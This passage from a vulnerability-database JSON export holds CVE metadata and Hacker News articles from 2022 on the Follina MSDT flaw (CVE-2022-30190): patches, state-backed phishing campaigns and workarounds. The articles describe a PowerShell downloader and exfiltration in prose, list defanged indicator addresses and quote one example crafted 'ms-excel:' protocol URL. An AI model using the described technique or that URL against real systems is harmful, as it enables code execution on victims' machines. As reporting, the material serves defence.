false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T18:15:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2022-30190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2022-08-11T10:01:52", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgzvxB2K_EqWauP8RXXDGq8L8wGV4BI0Hng-GkPQGun_flvTywSZzmrfPAZGEHV9NomsUUWuONQ52aAAzOwgK8sxLTUgtdoQKwqrW76TtntBfvotW8Mfjv3CmeeU9Y-EKc7DfEq1XpzFrQCH0z6Yusx4f24nFKK1y4MNbsku2j_Rz-7d-Zk32cfR8pQ/s728-e100/patch-tuesday.jpg>)\n\nAs many as [121 new security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) were patched by Microsoft as part of its Patch Tuesday updates for the month of August, which also includes a fix for a Support Diagnostic Tool vulnerability that the company said is being actively exploited in the wild.\n\nOf the 121 bugs, 17 are rated Critical, 102 are rated Important, one is rated Moderate, and one is rated Low in severity. 
Two of the issues have been listed as publicly known at the time of the release.\n\nIt's worth noting that the 121 security flaws are in addition to [25 shortcomings](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) the tech giant addressed in its Chromium-based Edge browser late last month and the previous week.\n\nTopping the list of patches is [CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) (CVSS score: 7.8), a case of remote code execution affecting the Microsoft Windows Support Diagnostic Tool (MSDT), making it the second flaw in the same component after [Follina](<https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html>) (CVE-2022-30190) to be weaponized in [real-world attacks](<https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/>) within three months.\n\nThe vulnerability is also said to be a variant of the flaw publicly known as [DogWalk](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>), which was originally disclosed by security researcher Imre Rad in January 2020.\n\n\"Exploitation of the vulnerability requires that a user open a specially crafted file,\" Microsoft said in an advisory. \"In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file.\"\n\nAlternatively, an attacker could host a website or leverage an already compromised site that contains a malware-laced file designed to exploit the vulnerability, and then trick potential targets into clicking on a link in an email or an instant message to open the document.\n\n\"This is not an uncommon vector and malicious documents and links are still used by attackers to great effect,\" Kev Breen, director of cyber threat research at Immersive Labs, said. 
\"It underscores the need for upskilling employees to be wary of such attacks.\"\n\nCVE-2022-34713 is one of the two remote code execution flaws in MSDT closed by Redmond this month, the other being [CVE-2022-35743](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35743>) (CVSS score: 7.8). Security researchers Bill Demirkapi and Matt Graeber have been credited with reporting the vulnerability.\n\nMicrosoft also resolved three privilege escalation flaws in Exchange Server that could be abused to read targeted email messages and download attachments ([CVE-2022-21980](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21980>), [CVE-2022-24477](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24477>), and [CVE-2022-24516](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24516>)) and one publicly-known information disclosure vulnerability ([CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>)) in Exchange which could as well lead to the same impact.\n\n\"Administrators should enable [Extended Protection](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>) in order to fully remediate this vulnerability,\" Greg Wiseman, product manager at Rapid7, commented about CVE-2022-30134.\n\nThe security update further remediates multiple remote code execution flaws in Windows Point-to-Point Protocol (PPP), Windows Secure Socket Tunneling Protocol (SSTP), Azure RTOS GUIX Studio, Microsoft Office, and Windows Hyper-V.\n\nThe Patch Tuesday fix is also notable for addressing dozens of privilege escalation flaws: 31 in Azure Site Recovery, a month after Microsoft [squashed 30 similar bugs](<https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html>) in the business continuity service, five in Storage Spaces Direct, three in Windows Kernel, and two in the Print Spooler module.\n\n### Software Patches 
from Other Vendors\n\nAside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/security/bulletin/2022-08-01>)\n * [Apache Projects](<https://blogs.apache.org/foundation/date/20220805>)\n * [Cisco](<https://thehackernews.com/2022/08/cisco-business-routers-found-vulnerable.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://support.f5.com/csp/article/K14649763>)\n * [Fortinet](<https://www.fortiguard.com/psirt?date=08-2022>)\n * [GitLab](<https://about.gitlab.com/releases/2022/07/28/security-release-gitlab-15-2-1-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [IBM](<https://www.ibm.com/blogs/psirt/>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/August-2022>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Palo Alto Networks](<https://security.paloaltonetworks.com/>)\n * 
[Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/august-2022-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-10T06:12:00", "type": "thn", "title": "Microsoft Issues Patches for 121 Flaws, Including Zero-Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21980", "CVE-2022-24477", "CVE-2022-24516", "CVE-2022-30134", "CVE-2022-30190", 
"CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-11T08:22:02", "id": "THN:6C7E32993558CB9F19CAE15C18522582", "href": "https://thehackernews.com/2022/08/microsoft-issues-patches-for-121-flaws.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T15:35:06", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjWMKOvweSFs-6_yTKhS8Ei2IBg2vcJuX9wiigmwmv2hOkJWeIzjBRPZIGuCENyJ3ZhGbdw4r7S79Z_QdBYo0oVXNm1oL_JGsK3zHlILQmiu3OHiuBKqzhrFWj-vyyCk813l8T4dSdgnOz-c05mTwyfEA0pwW8cRr31kStWCgi_TDxMXnmMfDgheC7X/s728-e100/windows.jpg>)\n\nA suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office \"Follina\" vulnerability to target government entities in Europe and the U.S.\n\nEnterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked as [CVE-2022-30190](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) (CVSS score: 7.8). 
No less than 1,000 phishing messages containing a lure document were sent to the targets.\n\n\"This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253,\" the company [said](<https://twitter.com/threatinsight/status/1532830739208732673>) in a series of tweets.\n\nThe payload, which manifests in the form of a PowerShell script, is Base64-encoded and functions as a downloader to retrieve a second PowerShell script from a remote server named \"seller-notification[.]live.\"\n\n\"This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil[tration] to 45.77.156[.]179,\" the company added.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiF_m7_KsHBbfl6j9PPTd8t5DZ4_iAR6cG5PWwiqwiHn_YkdsXkjr3qRPs83Oje0Y5pqaKc2zav2Crnq-KH0HGQpBeKMWZaR8dtf2akXuHmO8cwk7tpkBX5uKcHjq5az14xOsPTCFUi71Lo2E4DebsFoKvV-d0ML_UZr_ap7hkNoBGdGo3Q4L6VVWgs/s728-e100/hacking.jpg>)\n\nThe phishing campaign has not been linked to a previously known group, but said it was mounted by a nation-state actor based on the specificity of the targeting and the PowerShell payload's wide-ranging reconnaissance capabilities.\n\nThe development follows [active exploitation attempts](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by a Chinese threat actor tracked as TA413 to deliver weaponized ZIP archives with malware-rigged Microsoft Word documents.\n\nThe Follina vulnerability, which leverages the \"ms-msdt:\" protocol URI scheme to remotely take control of target devices, remains unpatched, with Microsoft urging customers to [disable the protocol](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) to prevent the attack vector.\n\nIn the absence of a security update, 0patch has released an [unofficial 
fix](<https://blog.0patch.com/2022/06/free-micropatches-for-follina-microsoft.html>) to block ongoing attacks against Windows systems that target the Microsoft Windows Support Diagnostic Tool (MSDT) vulnerability.\n\n\"It doesn't matter which version of Office you have installed, or if you have Office installed at all: the vulnerability could also be exploited through [other attack vectors](<https://twitter.com/0xBacco/status/1531599168363548672>),\" 0patch's Mitja Kolsek said.\n\n\"Proofpoint continues to see targeted attacks leveraging CVE-2022-30190,\" Sherrod DeGrippo, vice president of threat research, said in a statement shared with The Hacker News.\n\n\"The extensive reconnaissance conducted by the second PowerShell script demonstrates an actor interested in a large variety of software on a target's computer. This, coupled with the tight targeting of European government and local U.S. governments, led us to suspect this campaign has a state aligned nexus.\"\n"
, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T02:54:00", "type": "thn", "title": "State-Backed Hackers Exploit Microsoft 'Follina' Bug to Target Entities in Europe and U.S", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:27:16", "id": "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "href": "https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T17:56:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh4XDd5jxlShcQhkpFMeDWuIXh2lmuW6g-pOpYsWcAxsVQeXRD_zrP4VSvk676NwsbCPmQ3N8RbQ0Ox5emUCLWdANDTfkxyX8ZNmIeOx8--iO40HnXyGESjApgsZEkN1p7JZLQWLLVJ3imK_5umSJiUUWXduvPJeQ_nLWxfSUN92U64HfLhpAUbxKty/s728-e100/Windows-Update.jpg>)\n\nMicrosoft on Monday published guidance for a newly 
discovered [zero-day security flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in its Office productivity suite that could be exploited to achieve code execution on affected systems.\n\nThe weakness, now assigned the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and Office 2021, as well as Professional Plus editions, are impacted. \n\n\"To help protect customers, we've published CVE-2022-30190 and additional guidance [here](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>),\" a Microsoft spokesperson told The Hacker News in an emailed statement.\n\nThe [Follina](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) vulnerability, which came to light late last week, involved a real-world exploit that leveraged the shortcoming in a weaponized Word document to execute arbitrary PowerShell code by making use of the \"ms-msdt:\" URI scheme. The sample was uploaded to VirusTotal from Belarus.\n\nBut first signs of exploitation of the flaw date back to April 12, 2022, when a second sample was uploaded to the malware database. 
This artifact is believed to have targeted users in Russia with a malicious Word document (\"[\u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0432\u044c\u044e.doc](<https://www.virustotal.com/gui/file/710370f6142d945e142890eb427a368bfc6c5fe13a963f952fb884c38ef06bfa/detection/>)\") that masqueraded as an interview invitation with Sputnik Radio.\n\n\"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\" Microsoft said in an advisory for CVE-2022-30190.\n\n\"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjDwwcRQQLel_buVz-cP2D87KQ9SRU9AxTyvKVy-yD0XyMjUWUJFIiu7fTBhtdu6J7nG76FktwEvqkjodphqnX--IwjAE_tEPQTVOrmlwWn6clHVQN0Ff7NvAu4wTmjsB3-cqjcU7OCOKQCCRGIY7JfsIBzOdqeZZ0DGfE37Z640iuKSDL2OtIBiu2q/s728-e100/hacking.jpg>)\n\nThe tech giant credited crazyman, a member of the [Shadow Chaser Group](<https://twitter.com/ShadowChasing1>), for reporting the flaw on April 12, coinciding with the discovery of the in-the-wild exploit targeting Russian users, indicating the company had been already aware of the vulnerability.\n\nIndeed, according to [screenshots](<https://twitter.com/CrazymanArmy/status/1531117401181671430>) shared by the researcher on Twitter, Microsoft closed the vulnerability submission report on April 21, 2022 stating \"the issue has been fixed,\" while also dismissing the flaw as \"not a security issue\" since it requires a passkey provided by a support technician when starting the diagnostic tool.\n\nBesides releasing detection rules for Microsoft Defender for Endpoint, the Redmond-based company has offered workarounds in its guidance to disable 
the MSDT URL protocol via a Windows Registry modification.\n\n\"If the calling application is a Microsoft Office application, by default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office, both of which prevent the current attack,\" Microsoft said.\n\nThis is not the first time Microsoft Office protocol schemes like \"ms-msdt:\" have come under the scanner for their potential misuse. Earlier this January, German cybersecurity company SySS [disclosed](<https://blog.syss.com/posts/abusing-ms-office-protos/>) how it's possible to open files directly via specially crafted URLs such as \"ms-excel:ofv|u|https://192.168.1.10/poc[.]xls.\"\n", "cvss3": {}, "published": "2022-05-31T05:12:00", "type": "thn", "title": "Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T17:53:19", "id": "THN:1EFEC00D867275514EA180819C9EF104", "href": "https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-21T03:59:01", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi1QE9YZxJQ6JKfU-Sykp9EhrAHv5DKf6S7qEofv-1kjCV8SamqdavCZcQ9VYRPBJo1Hyb0S2mD1SzfQulPeSx9sUm-eGvZsNXCn3qcQMfYMkYO8fsqBA53p-o42rQ4uqGeyzkO1_9XItfMG_wGq3g7TdYI8GR62vky7GemJ7dthWmKIEfPcKK9qnSB/s728-e100/russian-ddos-app.jpg>)\n\nRussian threat actors capitalized on the [ongoing conflict](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) against Ukraine to distribute Android malware camouflaged as an app for pro-Ukrainian hacktivists to launch 
distributed denial-of-service (DDoS) attacks against Russian sites.\n\nGoogle Threat Analysis Group (TAG) attributed the malware to Turla, an advanced persistent threat also known as Krypton, Venomous Bear, Waterbug, and Uroburos, and linked to Russia's Federal Security Service (FSB).\n\n\"This is the first known instance of Turla distributing Android-related malware,\" TAG researcher Billy Leonard [said](<https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/>). \"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.\"\n\nIt's worth noting that the [onslaught ](<https://thehackernews.com/2022/04/microsoft-documents-over-200.html>)of [cyberattacks](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) in the immediate aftermath of Russia's unprovoked invasion of Ukraine prompted the latter to [form an IT Army](<https://thehackernews.com/2022/03/both-sides-in-russia-ukraine-war.html>) to stage counter-DDoS attacks against Russian websites. 
The goal of the Turla operation, it appears, is to use this volunteer-run effort to their own advantage.\n\nThe [decoy app](<https://www.virustotal.com/gui/file/3c62b24594ec3cacc14bdca068a0277e855967210e92c2c17bcf7c7d0d6b782a/>) was hosted on a domain masquerading as the [Azov Regiment](<https://en.wikipedia.org/wiki/Azov_Regiment>), a unit of the National Guard of Ukraine, calling on people from around the world to fight \"Russia's aggression\" by initiating a denial-of-service attack on the web servers belonging to \"Russian websites to overwhelm their resources.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiJ03kkaYUTLinMlQQz9I43ISthyqrTsZa75Jlni48jqqkGuc8ZTNgQMW3J6DvBUkZBOOrTkzlYHoElomW1W2LTMHy5QvZHhM2i_P6XtJ-70QN_PZXzVWj9_4V5J0bvq0G3TNEsYBJTSSUU85A4Dw6EEZ0G74kPK5rSl_NODuMPTwbdTMDoREPAW_qb/s728-e100/android-ddos.jpg>)\n\nGoogle TAG said the actors drew inspiration from another Android app distributed through a website named \"stopwar[.]pro\" that's also designed to conduct DoS attacks by continually sending requests to the target websites.\n\nThat said, the actual number of times the malicious Cyber Azov app was installed is minuscule, posing no major impact on Android users.\n\nAdditionally, the Sandworm group (aka Voodoo Bear) has been connected to a separate set of malicious activities leveraging the [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to send links pointing to Microsoft Office documents hosted on compromised websites targeting media entities in Ukraine.\n\nUAC-0098, a threat actor that CERT-UA last month warned of [distributing tax-themed documents](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) carrying a Follina exploit, has also been assessed to be a former initial access broker with ties to the [Conti 
group](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) and in charge of disseminating the IcedID banking trojan.\n\nOther kinds of cyber activity include credential phishing attacks mounted by an adversary referred to as COLDRIVER (aka Callisto) aimed at government and defense officials, politicians, NGOs and think tanks, and journalists.\n\nThese involve sending emails either directly, including the phishing domain or containing links to documents hosted on Google Drive and Microsoft OneDrive that, in turn, feature links to an attacker-controlled website designed to steal passwords.\n\nThe [latest developments](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) are yet another indication of how Russian threat actors are exhibiting continued signs of increasing sophistication in their attempts to target in ways that highlight their evolving techniques.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-20T05:58:00", "type": "thn", "title": "Russian Hackers Tricked Ukrainians with Fake \"DoS Android Apps to Target Russia\" \u2014 The Hacker News", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-21T03:06:16", "id": "THN:7A6D54BC76D090840197DDF871D59731", "href": "https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T11:56:12", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiUNLbMQKFGJkk_0MuvTZUsbdZk7Mwzi1ubRnWBoCLxeBkICJ8W6xX9SHPsYas7bLDtqj4wO1lZsmsxuPuAxkocOzNUvBMbOmM2yJIGg2t7CnMv5yAaUiSHpTbdt9nsHappGPYR_oG1nild6RLvcMvaILplweROkw7HFZp7QvCAE_V31Ku-G5wnnnZq/s728-e100/office.jpg>)\n\nAn advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new [zero-day flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in Microsoft Office to achieve code execution on affected systems.\n\n\"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique,\" enterprise security firm Proofpoint [said](<https://twitter.com/threatinsight/status/1531688214993555457>) in a tweet.\n\n\"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app.\"\n\n[TA413](<https://malpedia.caad.fkie.fraunhofer.de/actor/ta413>) is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as [Exile RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat>) and [Sepulcher](<https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher>) as well as a rogue Firefox browser extension dubbed 
[FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\nThe high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the \"ms-msdt:\" protocol URI scheme to execute arbitrary code.\n\nSpecifically, the attack makes it possible for threat actors to circumvent [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) safeguards for suspicious files by simply changing the document to a Rich Text Format (RTF) file, thereby allowing the injected code to be run without even opening the document via the [Preview Pane](<https://docs.microsoft.com/en-us/windows/powertoys/file-explorer>) in Windows File Explorer.\n\nWhile the bug gained widespread attention last week, evidence points to active exploitation of the diagnostic tool flaw in real-world attacks targeting Russian users over a month ago on April 12, 2022, when it was disclosed to Microsoft.\n\nThe company, however, [did not deem it a security issue](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) and closed the vulnerability submission report, citing reasons that the MSDT utility requires a [passkey](<https://social.technet.microsoft.com/wiki/contents/articles/30458.windows-10-ctp-how-to-run-microsoft-support-diagnostic-tool.aspx#How_shall_I_get_the_Passkey>) provided by a support technician before it can execute payloads.\n\nThe vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions Office 2013 through Office 21 and Office Professional Plus editions.\n\n\"This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros,\" Malwarebytes' Jerome Segura 
[noted](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>).\n\nAlthough there is no official patch available at this point, Microsoft has [recommended](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) disabling the MSDT URL protocol to prevent the attack vector. Additionally, it's been [advised](<https://twitter.com/wdormann/status/1531259406624620544>) to turn off the Preview Pane in File Explorer.\n\n\"What makes 'Follina' stand out is that this exploit does not take advantage of Office macros and, therefore, it works even in environments where macros have been disabled entirely,\" Nikolas Cemerikic of Immersive Labs said.\n\n\"All that's required for the exploit to take effect is for a user to open and view the Word document, or to view a preview of the document using the Windows Explorer Preview Pane. Since the latter does not require Word to launch fully, this effectively becomes a zero-click attack.\"\n"
